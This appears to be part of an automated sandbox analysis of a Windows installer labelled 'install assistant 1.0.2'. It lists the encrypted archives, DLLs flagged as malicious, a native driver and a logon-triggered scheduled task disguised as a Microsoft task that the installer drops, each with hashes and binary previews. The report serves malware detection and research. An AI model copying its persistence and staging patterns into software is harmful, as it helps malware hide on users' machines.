                            Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.

                            C:\Program Files (x86)\Windows NT\locale7.bin

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653607
                            Encrypted:true
                            SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                            MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                            SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                            SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                            SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                            Malicious:false
                            Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.

                            C:\Program Files (x86)\Windows NT\locale7.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653608
                            Encrypted:true
                            SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                            MD5:A9C8A3E00692F79E1BA9693003F85D18
                            SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                            SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                            SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                            Malicious:false
                            Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8

                            C:\Program Files (x86)\Windows NT\res.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):1298992
                            Entropy (8bit):7.999859712098505
                            Encrypted:true
                            SSDEEP:24576:lS6oXJtF6HcpRkxQVgWmX5UP4igmlSjb+lnlM+xXd8ZEIzkiC6/ahnW0ISNJi:lS6oXJjecpRkiq/udgmlSnynS+z8qIYc
                            MD5:682645AD9182AA4DEB865D068B1CCE11
                            SHA1:7587BB39554B309CDE18010293B4AE06C0F36DA8
                            SHA-256:CF7D68ABF8390DF41C07606FC533D758B9C21D02A85372B39D395BDD255C08B7
                            SHA-512:A1CCA2B1F05DDB5FD601A9ABF472208B95EEF62466507C2C21DD7CE5513E475F8E07A20E612DD98F5031D20589D4E3805F3BC815D1C45058E2C2D2FC9C39FE6E
                            Malicious:false
                            Preview:7z..'...............@.......#..;.A.....M^C..G.<.M.p.1...r...qE.dOR*...L..<.....4<.....d>L......]q....T.u_...0.vw......D...Up....A.3..'EN.h..Ew4......d.1G... .'.T....N.a.U....J.......*.E..t...!>.%NNf....]....b..2f.........2e.r...G..Zq....r.{.L.....=.Q...s.p......h,.....-.....-...v..qT.AKm.J..}o...N~X.h.yZ....U........1U.......#y.cRw..)c-\....J..e..c.64M}2Oyo{....J...a-..[v...N.u%....k[..U..U.W.0\.6.?J....kng..Qh.6.G....>..2........r.7...M...* ....S../!.fyR.h..pc ..;..g...$.....p.td{~....P\F..H.C#+..f..(.....Rc..pr..(..7....,.)Ow....A-s5..a.0.-..I.g#]$.:{..;U..Q2.&...bm|.f..pTKY...-..............-...A....e.=..n.Ht...O..y3]-k.{.C....0.i...c...Mg..+...'.w#.A....a..y..........i*.?.B..|f1.0.s].BA(.-74.D3..........a......d..^.....p.C..]..*.7...b....*b%&&.2..->N........R....<.Z.VG.e......+N..'.c....)....H+..F....C.V...z.^....`[.D.d..3.(....^.(&../..W.....9.gS`.j.`.....J.......Wq.r.'..P.Av.e..X.....7.K.rE}...........e...v5.}&../..).^.Q%

                            C:\Program Files (x86)\Windows NT\tProtect.dll

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):63640
                            Entropy (8bit):6.482810107683822
                            Encrypted:false
                            SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                            MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                            SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                            SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                            SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 9%
                            • Antivirus: Virustotal, Detection: 6%, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................

                            C:\Program Files (x86)\Windows NT\task.xml

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):3.344834847024567
                            Encrypted:false
                            SSDEEP:48:dXKLzDlnbL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnKwhldOVQOj6dKbKsz7
                            MD5:7F252B19B6E96247184F55570325E9FA
                            SHA1:E6D4AD432CB4864C0E1A08FB15255F7973807B3D
                            SHA-256:84460DE817C9A6637650C7ED83D15DD14836FB841FF9790D4F2D1A8D6BAAB0ED
                            SHA-512:A5741E4F5095BB24A28E5909CC659CB53535BD1E7A2555FA9D2660155F8CA80F96136E2CA589CCD2154FCF264B8FD525782B8C9752022B986F20D3F1454496EF
                            Malicious:false
                            Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvai

                            C:\Program Files (x86)\Windows NT\trash

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1048934
                            Entropy (8bit):7.999810584659191
                            Encrypted:true
                            SSDEEP:24576:zzo7JKPe56MvMbFP0ERf6gc0mgl2Cz8fyDPPK+tNTbotfxeeW:zzo1KPepUP/f6Z0NlZsyjy+tZb4AeW
                            MD5:D6E21035CF34180A78FD0609ACFA9285
                            SHA1:721C65391A0C2E18987202864D1CB08F9545AA3D
                            SHA-256:D1B45E42ABAEB7560E8E186277974790F97E141CAFCC3FF920460E542F9CD1AF
                            SHA-512:566E9571B984CDBF2BC9E51101894BB0BF61E857C03D90888AB9EAF93B3BDB7368F274D21893281A4603FE6390CA66EE201E022D25DADBA804D3523DFDE69D6C
                            Malicious:false
                            Preview:.hi..2...%....H.k...J.o,ET$+V..<..p.O.c._...R.?R.zmf."<...U....Fh....g......,....4-....*-.........qC...r..%..4...{...h..gm\"..er.T....H.l{=.<l...}...e....u.wT..bf....$...Z......j#..?...7..k..m#..3..A*.....<9T.n...I...YY..2l..)O..r.+.f.G...y......"K..c.7ug..].........d&.$.....u.............V..c.J>U.@..>2....5i...f.RcVP.:..........~.......q)t....P.V.l.h2.E..;.qE3p.6.....dn..4...o.q...........p....&.H.. .Z~..K......T.|.c*Q.5.tfStC........~..AX.J,.....i.T)lY..S.z..sL._........].......evYr...M.[v..6+.r.. H.m.k4...x*w..X....Q.n~.......+y../z5..'.._$.{<&.dZu.z?SHeIn~V..m.....4.v.,Z.5.}..^.D/h..6.R.-8.q.O.d...a....h..B......(..Dm`*.).xCW.".......V.D.db......Y.7..r..6.*.0;$....4......[.`..8.b.....wb.H1...S....c...f/......j..NX..h1.....R.O.dm.P..g..)..KT.....x.y...H.|...1..k%...v.S...u,.6.bn~...^.....AS[..u...q.Q.G4x.KB..q....&.$...o.H.i.MoX.w.*..*..........K....@..SF.*[...u..H...{?.Z.x>.u.......&3.?......s...Px9.._;..-U....4.F...d*.%T..e..

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1940658735648508
                            Encrypted:false
                            SSDEEP:3:Nlllul7got/Z:NllUkot
                            MD5:71995B6B43EA2A2D49079E9E99E8D184
                            SHA1:A55CE57E044A814007D3EE7DCCF1527EF391036A
                            SHA-256:FD011C1349ABA970E984930A34129F61F60BF70A92E4E1748C4DCFFA3E22DFBF
                            SHA-512:6CFBFC9B41995E53733EDCEC9747C4B7EA800D267145D6A879637CBC2B96E06C1D8CFEE9CDC59A6E57A32AEFE5A941448A029B16F4B2A11EF8CC0F579352509A
                            Malicious:false
                            Preview:@...e................................................@..........

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_illnotcs.gfr.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oipj2nn1.rbm.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ttitxb4f.r3f.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uyi3apxl.grt.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\is-27JG6.tmp\_isetup\_setup64.tmp

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            • Antivirus: Virustotal, Detection: 0%, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\is-27JG6.tmp\update.vac

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:true
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp

                            Download File
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3366912
                            Entropy (8bit):6.530561164569484
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:FFE4B45A6AE66BCB0FA01197725E2E27
                            SHA1:AA72B2B7AB2CAEE1068DDBB88302B8E366CF52C0
                            SHA-256:E69DC5ABBD55150D1A261D29754EE32283310D03F63C7B464F6B153817A33593
                            SHA-512:0D8E0E3C262493EC3F1805B1C063DA860A6DED98D1ECD9970FB4A402C8875A66A824B7BD889DA43841089EF208072DC15C6904EFC7D167FF4854C041778E0758
                            Malicious:true
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                            C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp

                            Download File
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3366912
                            Entropy (8bit):6.530561164569484
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:FFE4B45A6AE66BCB0FA01197725E2E27
                            SHA1:AA72B2B7AB2CAEE1068DDBB88302B8E366CF52C0
                            SHA-256:E69DC5ABBD55150D1A261D29754EE32283310D03F63C7B464F6B153817A33593
                            SHA-512:0D8E0E3C262493EC3F1805B1C063DA860A6DED98D1ECD9970FB4A402C8875A66A824B7BD889DA43841089EF208072DC15C6904EFC7D167FF4854C041778E0758
                            Malicious:true
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                            C:\Users\user\AppData\Local\Temp\is-P3CLM.tmp\_isetup\_setup64.tmp

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\is-P3CLM.tmp\update.vac

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:true
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

                            \Device\ConDrv

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:ASCII text, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):406
                            Entropy (8bit):5.117520345541057
                            Encrypted:false
                            SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                            MD5:9200058492BCA8F9D88B4877F842C148
                            SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                            SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                            SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                            Malicious:false
                            Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.926928632634154
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 98.04%
                            • Inno Setup installer (109748/4) 1.08%
                            • InstallShield setup (43055/19) 0.42%
                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                            File name:#U5b89#U88c5#U52a9#U624b1.0.2.exe
                            File size:5'986'125 bytes
                            MD5:315719354db8520278ae3d022b90da14
                            SHA1:46a92e47bdea70bef469eca470bb3b280f0fcd06
                            SHA256:e9d2969683bcc59dee33d048904b3bfb7af7b140ce360a326bb5bb9b3ef3b57e
                            SHA512:7e8f27c638b512c07d65af3d38db4c494d1c839bf1e11158f75935986c6934cf6884cb8b2f48742d14ff747460599eb85e2f3a865584a6a9769b2776032747d2
                            SSDEEP:98304:XwREDF7dlsK9h1hNngwVtIyINldOA8WZFt9Z0lJdMwZgo:lNdNh7dIT3dOAlrMRB
                            TLSH:80561213F2CBE03EE05E0B3715B2A25484FB6A216522AE5796ECB4ECCF351601D3E647
                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                            File Icon

                            Icon Hash:0c0c2d33ceec80aa

                            Static PE Info

                            General

                            Entrypoint:0x4a83bc
                            Entrypoint Section:.itext
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:1
                            File Version Major:6
                            File Version Minor:1
                            Subsystem Version Major:6
                            Subsystem Version Minor:1
                            Import Hash:40ab50289f7ef5fae60801f88d4541fc

                            Entrypoint Preview

                            Instruction
                            push ebp
                            mov ebp, esp
                            add esp, FFFFFFA4h
                            push ebx
                            push esi
                            push edi
                            xor eax, eax
                            mov dword ptr [ebp-3Ch], eax
                            mov dword ptr [ebp-40h], eax
                            mov dword ptr [ebp-5Ch], eax
                            mov dword ptr [ebp-30h], eax
                            mov dword ptr [ebp-38h], eax
                            mov dword ptr [ebp-34h], eax
                            mov dword ptr [ebp-2Ch], eax
